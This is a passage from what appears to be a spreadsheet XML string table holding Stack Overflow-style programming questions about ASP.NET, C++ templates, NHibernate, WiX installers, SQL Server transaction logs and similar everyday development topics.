    <t xml:space="preserve">&lt;p&gt;Ours is an upcoming company, so we cannot buy two three third party controls and find out by ourselves which the best one is.(One of the better solutions)
We have a budget to buy just one.
So we would like to know which is third party control is the best to use in ASP.NET based on your experiences.&lt;/p&gt;
&lt;p&gt;And also I definitely saw a question asked already here.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/215993/best-3rd-party-aspnet-grid-control"&gt;http://stackoverflow.com/questions/215993/best-3rd-party-aspnet-grid-control&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Still asking this because&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Wanna know not just about grid, i wanna know about the whole set.&lt;/li&gt;
&lt;li&gt;Didn't see many answers for that.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;So please provide us some advice on how to proceed.
Our requirements are&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Bug Free working&lt;/li&gt;
&lt;li&gt;Speed&lt;/li&gt;
&lt;li&gt;Good documentation&lt;/li&gt;
&lt;li&gt;Excellent Support Team&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Also is there a third party ListView?&lt;/p&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;Naveen&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I/O priority of a process be increased?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to increase the I/O priority of a process. Answers for both .NET and Windows Vista would be nice. processexplorer is ok as well.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Determine if Type is a pointer in a template function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I have a template function, for example like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;template&amp;lt;typename T&amp;gt;
void func(const std::vector&amp;lt;T&amp;gt;&amp;amp; v)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there any way I can determine within the function whether T is a pointer, or would I have to use another template function for this, ie:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;template&amp;lt;typename T&amp;gt;
void func(const std::vector&amp;lt;T*&amp;gt;&amp;amp; v)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to place YAML inside a YAML document</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working with Rails fixtures for testing my rails application.  It is all good except one of my database columns is supposed to hold YAML content.  But, I am sure how to put the YAML markup I want to load into my database inside the YAML file.  Here is an example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;mvnforum:
    name: mvnforum
    abstraction_type: SVN
    url: src: test username: admin #is this possible?
    sourcepath: mvnforum/src/
    webroot:
    codesecure_project: mvnforum
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If it is impossible to have YAML inside a YAML file what would be the best why to load this into a database for testing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Eclipse features in VisualStudio</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This might of been asked elsewhere (seems like a useful topic) but searches turned up nothing.&lt;/p&gt;
&lt;p&gt;One feature I love in Eclipse when programming Java is that I don't have to worry about putting in the import statements and any missed functions from interfaces that I am implementing them - if I do miss them a simple click from a list implements them for me.&lt;/p&gt;
&lt;p&gt;Now I am working in VisualStudio2008 with C# I am really missing that functionality. I was wondering if the functionality is in there, but buried or can be purchased through a 3rd party?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using extension methods within inline databinding context</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use some extension methods that I use to apply consistent formatting to DateTime and Int32 - which works absolutely fine in code behind, but I'm having issues with databinding.&lt;/p&gt;
&lt;p&gt;I get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;'System.DateTime' does not contain a definition for 'ToCustomShortDate'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;for&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%# ((ProductionDetails)Container.DataItem).StartDate.ToCustomShortDate() %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(inside a templatefield of a gridview contained on a usercontrol)&lt;/p&gt;
&lt;p&gt;Even when I'm including the namespace that the extension method is defined in at the top of the usercontrol:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%@ import namespace="MyAssembly.Formatting" %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Has anyone else come across this and is there any way to resolve it?&lt;/p&gt;
&lt;p&gt;&lt;b&gt;EDIT:&lt;/b&gt; My mistake, above should be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%@ import namespace="MyNamespace.Formatting" %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;ie. I'm not incorrectly referencing the namespace (works vertabim in the code behind)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fastest way to calculate file hash?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A lot of files will be stored in the DB and I need file hashes to unique identify that the file was not changed.
(In general, will be used as the Windows Personal Firewall part)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can (or should) I mock methods on the object being tested other than the method being tested?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a class like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class ClassA
{
    public bool MethodA()
    {
      //do something complicated to test requiring a lot of setup
    }
    public bool MethodB()
    {
         if (MethodA())
             //do something
         else
             //do something else
         endif
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tests for MethodA and want to test MethodB, but all I want to do is to verify that if MethodA returns true that something happens and if MethodA returns false that something else happens.  Can I do this with Rhino Mocks? Or do I have to set up all of the same mocks that I have already in the tests for MethodA?&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">What is the easiest way to convert a simple form into an exe file? </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an offline paper based form. I need to convert it into a software that people can use on their computers to fill and submit information. Since the form (it is a tax return) requires considerable time in filling, it is not convenient to have it online. I would much rather have a simple exe which gathers information, applies validation rules and then uploads a structured data file (like an XML file) containing the filled info.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;I mean that I have an offline paper based form. I need to convert it into a software that people can use on their computers to fill and submit information. Since the form (it is a tax return) requires considerable time in filling, it is not convenient to have it online only. I would much rather have a simple exe which gathers information, applies validation rules and then uploads a structured data file (like an XML file) containing the filled info.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Latex: hyperref to individual longtable rows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a few longtables that stretch several pages and I want to use pageref and hyperref to link to these rows.&lt;/p&gt;
&lt;p&gt;But whatever I try, the links always refer to the start of the table.
When I look into the aux file, the labels all seem to be re-defined into table.[number of table].&lt;/p&gt;
&lt;p&gt;I tried putting invisible dummy figures into the table, but that just gives me errors of too many floats.&lt;/p&gt;
&lt;p&gt;I also tried putting the labels into minipages, to no avail.&lt;/p&gt;
&lt;p&gt;Even putting the labels into footnotes doesn't work, somehow longtable always seems to get to them.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>404 Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Certain &lt;a href="http://www.avg.com/special-toolbar-404-dns-error-tlbrc.tpl-mcr1" rel="nofollow"&gt;malware such as AVG&lt;/a&gt; hijack 404 pages in order to display a page in the browser riddled with their own ads.
The only work around I've found is to abandon 404 http status codes for custom error pages in my webapp.&lt;/p&gt;
&lt;p&gt;Is there any other work around?&lt;/p&gt;
&lt;p&gt;Edit:&lt;/p&gt;
&lt;p&gt;Anybody know of any other toolbars/programs that also hijack 404 pages without checking whether they are generic error pages or not?&lt;/p&gt;
&lt;p&gt;Is there a way to detect the presence of AVG from the query string or otherwise? (I assume not)&lt;/p&gt;
&lt;p&gt;I've created a &lt;a href="http://www.petitiononline.com/avg404/petition.html" rel="nofollow"&gt;petition to AVG&lt;/a&gt; on this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the format of xml context definition file that XmlApplicationContext(sFileName) will read?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;All the examples that I can search online use the App.Config mode of specifying the context definition retrieved by &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;contextToGetSprungObjects = ContextRegistry.GetContext(contextname)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to use &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;contextToGetSprungObjects = new XmlApplicationContext(sXmlFileName)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(I'm calling into a DLL (that needs Spring.net) from another executable (MsWord) so app.config approach is out). I tried sneaking in MyDll.dll.config.. didn't fly.
On using the XmlApplicationContext approach to read it from a specified xml file, I get the following error &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{"Error registering object with name '' defined in 'file [D:\\Work\\Seven\\WordAutomation\\ContentControls\\WordDocument1\\bin\\debug\\MyWPFPlotPopup.dll.config]' : There is no parser registered for namespace ''\r\n&amp;lt;configSections&amp;gt;&amp;lt;sectionGroup name=\"spring\"&amp;gt;&amp;lt;section name=\"context\" type=\"Spring.Context.Support.ContextHandler, Spring.Core\" /&amp;gt;&amp;lt;/sectionGroup&amp;gt;&amp;lt;section name=\"log4net\" type=\"log4net.Config.Log4NetConfigurationSectionHandler, log4net\" /&amp;gt;&amp;lt;/configSections&amp;gt;"}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which leads me to believe that the two approaches need their xml in a differently shaped bottle. I searched high and low but the schema for the xml that is needed eludes me.. everything I can find uses X.exe.config or Web.config. Can someone point me to a valid xml context defintion for Spring.net?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;spring&amp;gt;
    &amp;lt;context&amp;gt;
        &amp;lt;context name="MyApplication"&amp;gt;
            &amp;lt;resource uri="file://Resources/MyApplicationContext.xml"/&amp;gt;
        &amp;lt;/context&amp;gt;
    &amp;lt;/context&amp;gt;
&amp;lt;/spring&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I think this is the relevant section of the app.config that I want Spring.net to readd&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to know if a user has administrative privileges from a VBScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to check whether the user executing the script has administrative privileges on the machine.&lt;/p&gt;
&lt;p&gt;I have specified the user executing the script because the script could have been executed with a user other than the logged on using something similar to "Runas".&lt;/p&gt;
&lt;p&gt;@Javier: Both solutions work in a PC with an English version of Windows installed but not if the installed is in different language. This is because the Administrators group doesn't exist, the name is different for instance in Spanish. I need the solution to work in all configurations. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>SignalAndWait for lock-context</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a manager class that produces tasks for a threadpool, and each thread is supposed to do a call back once they are finished.&lt;/p&gt;
&lt;p&gt;I use locks to handle variables and fields, and signals to handle interthread communications. What I'm looking for is a way of exiting the current lock() and wait for a signal atomically, something like SignalAndWait, but for locks().&lt;/p&gt;
&lt;p&gt;The code looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// ... part of the scheduler
foreach(WorkTask task in worktasks)
{
   lock(_syncObj)
   {
      new Job(task, myCallback); // creates a thread
      instanceCount++;
      while(instanceCount &amp;gt; _maxConcurrentTasks)
          _resetEvent.WaitOne(Timeout.Infinite);
   }
}
// .. the callback
void myCallback()
{
    lock(_syncObj)
    {
        instanceCount--;
        _resetEvent.Set();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem here is that .WaitOne() doesn't exit the lock(), so any thread doing a callback will dead-lock.&lt;/p&gt;
&lt;p&gt;I had high hopes for WaitOne(Int32, bool exitContext), but that context seems to be about remoting and stuff rather than synchronisations.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Source Control for different teams?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Need recommendations for this...&lt;/p&gt;
&lt;p&gt;I have 2 teams&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Enterprise SOA development with InfoPath 2003, BizTalk 2006, MSCRMv3, custom .net2 website and a bunch of webservices using VSStudio 2005 with TFS.&lt;/li&gt;
&lt;li&gt;Web Team focused on public facing websites - using Adobe Suite, VSStudio 2005.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;As mentioned team 1 have TFS- we dont do daily/weekly/fornight/intergration builds as we dont do that type of methodology - but we do have a custom build/test solution using msbuild plumbed into TFS.  (it does other funky things like zips for archive the version/delist biztalk, deploy new assemplies in biztalk and renelist of biztalk and a full deploy of the website and services)&lt;/p&gt;
&lt;p&gt;Team 2 have nothing... other than a zip archive of versions.&lt;/p&gt;
&lt;p&gt;Issues...&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;TFS is expensive&lt;/li&gt;
&lt;li&gt;Both teams are used to the "locking school" of source control.&lt;/li&gt;
&lt;li&gt;need source control for differing assests&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Any suggestions - OSS or other wise?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What causes an application pool in IIS to recycle?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been searching for info on this to no avail. The context of why i need this is &lt;a href="http://stackoverflow.com/questions/271944/storing-temporary-user-files-in-aspnet-in-medium-trust"&gt;another question I asked here&lt;/a&gt;. More specifically, does creating/updating/deleting files in App_Data cause a pool recycle?&lt;/p&gt;
&lt;p&gt;If someone could provide a detailed list of what causes a recycle, that would be great.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;: As two users already noticed I would also be happy to an answer specifying reasons for recycling the AppDomain only and not the whole pool.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Globalization -- Displaying dates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Good morning,&lt;/p&gt;
&lt;p&gt;Apologies for the newbie question.  I'm just getting started with ASP.NET internationalization settings.&lt;/p&gt;
&lt;p&gt;Background info:&lt;/p&gt;
&lt;p&gt;I have a website which displays a &lt;code&gt;&amp;lt;table&amp;gt;&lt;/code&gt; HTML object.  In that &lt;code&gt;&amp;lt;table&amp;gt;&lt;/code&gt; HTML object, I have a column which displays dates.  My server being in the US, those dates show up as &lt;code&gt;MM/DD/YYYY&lt;/code&gt;.  Many of my users plug into this webpage through Excel, via the Data --&gt; Import External Data --&gt; Import Web Query interface.  My users, for the most part, are in the US, so those dates show up correctly in their Excel screens.&lt;/p&gt;
&lt;p&gt;Now I need to make the webpage work for UK users.  As is, they are downloading the dates as &lt;code&gt;MM/DD/YYYY&lt;/code&gt;, which makes their spreadsheets unusable since their regional settings are set to &lt;code&gt;DD/MM/YYYY&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;My question is:&lt;/p&gt;
&lt;p&gt;How do I make it so the web server realizes that the incoming request has a &lt;code&gt;en-GB&lt;/code&gt; culture setting?  I could engineer my own little custom workaround, but I'm sure I'm not the first programmer to come across this.  How do the pro's handle this?  I'm looking for a solution that would be relatively simple and quick to put up, but I don't want to just put some crappy buggy piece of my own logic togethe that I'm going to dread 6 months from now.&lt;/p&gt;
&lt;p&gt;Thanks a lot in advance,
-Alan.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Microsoft SQL Server - What does it mean that a Transaction Log is Full?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What does it mean that a Transaction Log is Full? I have it the file set to grow 20% when needed. I have 4GBs left on the drive. How do I solve this issue permanently?
Running these commands solves the issue temporarily:&lt;/p&gt;
&lt;pre&gt;
DBCC SHRINKFILE('MyDatabase_log', 1)
BACKUP LOG MyDatabase WITH TRUNCATE_ONLY
DBCC SHRINKFILE('MyDatabase_log', 1)
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I display an icon in the System Tray?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to make my .Net application display a notification in the system tray. So I want to show an icon for that, can anyone tell how to do that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java Collections (LIFO Structure)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking in the Collections framework of Java for a LIFO Structure (Stack) without any success. Basically I want a really simple stack; my perfect option would be a Deque, but I am in Java 1.5.&lt;/p&gt;
&lt;p&gt;I would like not to have to add another class to my structure but I am wondering if that is possible:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Is there any class in the Collections framework (1.5) that does the job?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;If not, is there any way to turn a Queue in a LIFO Queue (aka Stack) without reimplementation?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;If not, which Interface or class should I extend for this task? I guess that keep the way that the guys of Sun have made with the Deque is a good start.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Thanks a lot.&lt;/p&gt;
&lt;p&gt;EDIT: I forgot to say about the Stack class: I have my doubts about this class when I saw that it implements the Vector class, and the Vector class is a little bit obsolete, isn't it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Wix Custom Actions with WixUI_Minimal</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, I'm trying to, after an application finishes installing (though in truth, it really doesn't matter when the secondary application is run, since it doesn't interact with the installed files during installation), run another program which is bundled with the application.  Pertinent code (with various stuff replaced with "...":&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;directory ...&amp;gt;
  &amp;lt;component ...&amp;gt;
  &amp;lt;File Id="IDINST" ... /&amp;gt;
  &amp;lt;/component&amp;gt;
&amp;lt;/directory&amp;gt;
...
&amp;lt;CustomAction Id="IDACTION" FileKey="IDINST" ExeCommand="..." Return="ignore" /&amp;gt;
...
&amp;lt;InstallExecuteSequence&amp;gt;
  &amp;lt;Custom Action="IDACTION" After="CostFinalize" /&amp;gt;
&amp;lt;/InstallExecuteSequence&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I checked the directory and the file was where I expected, but it was not executed after the install process.  In truth I really don't even want that file to be installed, just run and then deleted.  But I'll ignore that for now.  Anyways, I've seen several examples of triggering actions after dialogs but since I'm currently using &lt;code&gt;&amp;lt;UIRef Id="WixUI_Minimal" /&amp;gt;&lt;/code&gt; I don't think that's ideal.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where can I find the Dojo XMLNS DTD?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to add some Dojo widgets to my XHTML pages, but Dojo uses some attributes that aren't part of the XHTML spec.  For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input dojoType="ComboBox" type="text" dataUrl="/some_data.json" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;dojoType&lt;/code&gt; and &lt;code&gt;dataUrl&lt;/code&gt; attributes cause validation problems.  I believe Dojo lets me move &lt;code&gt;dojoType&lt;/code&gt; into the &lt;code&gt;class&lt;/code&gt; attribute:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input class="dojo-ComboBox" type="text" dataUrl="/some_data.json" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That solves part, but not all of the problem.  The "correct" solution would look something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input dojo:type="ComboBox" type="text" dojo:dataUrl="/some_data.json" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that requires a Dojo XMLNS declaration at the top of my HTML file, which means I need to find a copy of the Dojo XMLNS DTD.  I suspect I'll need to copy it to my server and host it there because I've extended the Dojo toolkit.  Will Dojo even pick up on the scoped version?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linq to Entity - can i get to another table in the model when in the list template MVC page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;in the out of the project template solution (Dynamic Data Web Application), I have the model created and all is good. - Get the list of the tables, and the select edit etc.&lt;/p&gt;
&lt;p&gt;But my database has linking tables that just contain forgien keys  - so the list template just displays the fk value&lt;/p&gt;
&lt;p&gt;&lt;img src="http://lh6.ggpht.com/_KoHB_k0rTus/SSUbvobGucI/AAAAAAAAAB4/MYPlVYtB2zQ/s288/PARLinkTable.jpg" alt="diagram of the table" /&gt;&lt;/p&gt;
&lt;p&gt;Is there away to combine the list of the row in the primary table with an inspection of another table based on the fk?&lt;/p&gt;
&lt;p&gt;More akin to a join in SQL? but using Linq2Entity and the MetaModel?&lt;/p&gt;
&lt;p&gt;Below is the List.aspx.cs - this seems to bind the standard grid to the entitydatasource, but this is to the current table as per the route in the MVC.&lt;/p&gt;
&lt;p&gt;But as you can see i need to go and query the Person, Role and Link table via the model to get the other fields so that this would be useful.
&lt;img src="http://lh5.ggpht.com/_KoHB_k0rTus/SSUd7yGYUgI/AAAAAAAAADI/cbHUjV1GfrA/VS-Plain.jpg" alt="vstudio" /&gt;&lt;/p&gt;
&lt;p&gt;PS want to try and keep this in LINQ2Entity if possible  -trying to grok&lt;/p&gt;
&lt;p&gt;the natural thing that I want to do is start to spin off new sql queries to go and retrive the values.  But this is not in this idiom.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>custom dialog with a text field in winmobile</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to have a simple custom dialog box, like a message box, that has a label and a TextBox. If there's a simple way to do this, sorry! I'm really not well versed in the dialog stuff. &lt;/p&gt;
&lt;p&gt;Thanks for any help, guys!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to move a sql server express mdf file to a different sql sever express server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to move my database.mdf file from a development environment to a SQL Server Express server that is hosted on my VPS - but I can't figure out how to attach the file to my database server. Help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio 2008 will not edit read only files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, up until today, when I tried to edit a read only file in VS2008, a dialog popped up giving me three options:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Edit in memory&lt;/li&gt;
&lt;li&gt;Make writable&lt;/li&gt;
&lt;li&gt;Save a copy&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There was also a checkbox which read "Never allow in memory edits".&lt;/p&gt;
&lt;p&gt;Suddenly, it has stopped offering these options and simply will not accept any input in the editor window if the file is read only. I have to go into windows explorer and mark the file as not read only then reopen it in VS before I can make any changes.  I'm working on a large project, with lots of source controlled files and often need to make local only changes to files, so this is a real PITA.&lt;/p&gt;
&lt;p&gt;I'm guessing I must have checked the never allow in memory edits checkbox by mistake. &lt;/p&gt;
&lt;p&gt;There is an option in Tools.. Options.. Environment.. Documents which reads:&lt;/p&gt;
&lt;p&gt;"Allow editing of read only files, warn when attempt to save"&lt;/p&gt;
&lt;p&gt;This checkbox is ticked, and changing its value currently as no effect. I've tried closing and opening studio, restarting my machine etc - all to no avail.&lt;/p&gt;
&lt;p&gt;Anyone know how to restore the previous behaviour?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to delete child object in NHibernate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a parent object which has a one to many relationship with an IList of child objects. What is the best way to delete the child objects? I am not deleting the parent. My parent object contains an IList of child objects. Here is the mapping for the one to many relationship:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;bag name="Tiers" cascade="all"&amp;gt;
  &amp;lt;key column="mismatch_id_no" /&amp;gt;
  &amp;lt;one-to-many class="TGR_BL.PromoTier,TGR_BL"/&amp;gt;
&amp;lt;/bag&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I try to remove all objects from the collection using clear(), then call SaveOrUpdate(), I get this exception:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.Data.SqlClient.SqlException: Cannot insert the value NULL into column
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I try to delete the child objects individually then remove them from the parent, I get an exception: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;deleted object would be re-saved by cascade
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is my first time dealing with deleting child objects in NHibernate. What am I doing wrong?&lt;/p&gt;
&lt;p&gt;edit: Just to clarify  - I'm NOT trying to delete the parent object, just the child objects. I have the relationship set up as a one to many on the parent. Do I also need to create a many-to-one relationship on the child object mapping?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET 3.5 chart controls exception: Error executing child request for ChartImg.axd</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone getting this error when using the new free chart controls MS bought from Dundas?&lt;/p&gt;
&lt;p&gt;"Error executing child request for ChartImg.axd"&lt;/p&gt;
&lt;p&gt;On the MSDN forum they suggested it was my web.config:
 &lt;a href="http://social.msdn.microsoft.com/Forums/en-US/MSWinWebChart/thread/1dc4b352-c9a5-49dc-8f35-9b176509faa1/"&gt;MSDN forum post&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;So far that hasn't fixed the problem though.  Any other ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I redraw my degrafa background when scrolling?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using a canvas which has a degrafa background, so far so good. &lt;/p&gt;
&lt;p&gt;However, when scrolling, the background (degrafa grid) does not get redrawn.
In the code the background strokes are linked to  the container height. The  container height does not change even when scrolling.&lt;/p&gt;
&lt;p&gt;How do I get the height of the whole area so I can set the new height to my degrafa background?&lt;/p&gt;
&lt;p&gt;It looks like this:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.stack.imgur.com/9GzZR.png" alt="degrafa background example"&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;lt;mx:Canvas id="blackBoard"
                width="100%" 
                height="100%" 
                x="0" 
                y="0" 
                backgroundColor="#444444"
                clipContent="true"&amp;gt;
    &amp;lt;!-- Degrafa Surface   --&amp;gt;
    &amp;lt;degrafa:Surface id="boardSurfaceContainer"&amp;gt;
            &amp;lt;degrafa:strokes&amp;gt;
                &amp;lt;degrafa:SolidStroke    id="whiteStroke"
                                        color="#EEE"
                                        weight="1"
                                        alpha=".2"/&amp;gt;
            &amp;lt;/degrafa:strokes&amp;gt;
            &amp;lt;!-- Grid drawing --&amp;gt;
            &amp;lt;degrafa:GeometryGroup id="grid"&amp;gt;
                &amp;lt;degrafa:VerticalLineRepeater   count="{blackBoard.width / ApplicationFacade.settings.GRID_SIZE}"
                                                stroke="{whiteStroke}"
                                                x="0"
                                                y="0"
                                                y1="{blackBoard.height}"
                                                offsetX="0"
                                                offsetY="0"
                                                moveOffsetX="{ApplicationFacade.settings.GRID_SIZE}"
                                                moveOffsetY="0"/&amp;gt;
                &amp;lt;degrafa:HorizontalLineRepeater count="{blackBoard.height / ApplicationFacade.settings.GRID_SIZE}"
                                                stroke="{whiteStroke}"
                                                x="0"
                                                y="0"
                                                x1="{blackBoard.width}"
                                                offsetX="0"
                                                offsetY="0"
                                                moveOffsetX="0"
                                                moveOffsetY="{ApplicationFacade.settings.GRID_SIZE}"/&amp;gt;
            &amp;lt;/degrafa:GeometryGroup&amp;gt;          
        &amp;lt;/degrafa:Surface&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Need to generate a Persistent Transient Failure</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Update: A 4.x.x vs a 5.x.x became the least of my worries when I discovered that not all mail servers return errors according to the "standard". I'm opting to handle all types of returned mail as failures now but I'm leaving this question here in case it gets an answer and helps someone else.&lt;/p&gt;
&lt;p&gt;I've been tasked with writing a program to read a POP3 account and differentiate between mail returned as a permanent failure (5.x.x delivery status) and a persistent transient failure (4.x.x delivery status), doing a retry for the 4.x.x DSNs and flagging the email as bad for the 5.x.x DSNs. It's easy enough to hand-edit a DSNs body to change a 5.x.x to a 4.x.x but management would prefer that a "real" 4.x.x be returned. I'm having a lot of trouble doing so.&lt;/p&gt;
&lt;p&gt;Test environment is a Windows 2003 Server running MS's SMTP and POP3. I've already tried exceeding the quota on the target email address (5.x.x) and locking the account (2.x.x and they can't get the email).&lt;/p&gt;
&lt;p&gt;This is for end-of-lease notices, in case anyone is interested, which is why we're interested in flagging the emails as bad or retrying it the failure wasn't a permanent one.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Old School vs New School Programmers Problems and/or Benefits</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a recent college graduate working for a large corporation that has an aging workforce. I am curious for peoples experiences on working with an age gap preferably from both sides. &lt;/p&gt;
&lt;p&gt;Examples Issues I have encountered so far: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Agile practices vs Waterfall&lt;/li&gt;
&lt;li&gt;Collaboration between programmers vs individuality&lt;/li&gt;
&lt;li&gt;Working early in the morning vs late at night &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I learned primarily agile programming in school while the project I am on (and most of the developers are used to waterfall)&lt;/p&gt;
&lt;p&gt;I am used to collaborating with classmates and friends on projects while I tend to see older programmers like to do their own thing. I feel like I pester them asking them questions.&lt;/p&gt;
&lt;p&gt;I find myself more of a night programmer, but most of my older colleagues are early morning (5am)&lt;/p&gt;
&lt;p&gt;Any experiences on the age gap in the technology work is relevant.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Excel 2002 Web Query screwing up en-GB dates</t>
  </si>
  <si>
